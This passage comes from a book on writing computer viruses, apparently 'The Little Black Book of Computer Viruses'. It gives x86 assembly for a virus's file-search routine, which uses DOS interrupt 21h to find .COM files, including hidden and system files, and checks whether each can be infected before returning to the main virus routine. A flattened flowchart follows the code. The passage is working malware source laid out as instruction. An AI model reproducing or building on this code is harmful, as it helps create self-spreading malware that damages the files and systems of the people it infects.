if our search mechanism as a whole also uses the z flag to tell the main controlling program that it has found a file to infect (z=file found, nz=no file found) then our completed search function can be written like this: find_file: mov dx,offset comfile mov al,00000110b mov ah,4eh ;perform search first int 21h ff_loop: or al,al ;any possibilities found? jnz ff_done ;no - exit with z reset call file_ok ;yes, go check if we can infect it jz ff_done ;yes - exit with z set mov ah,4fh ;no - search for another file int 21h jmp ff_loop ;go back up and see what happened ff_done: ret ;return to main virus control routine figure 6: logic of the file search routine. setup search spec (*.com, hidden, system ok) search for first matching file file found? no exit no file file ok? yes search for next file exit, file found yes no 34 the little black book of computer viruses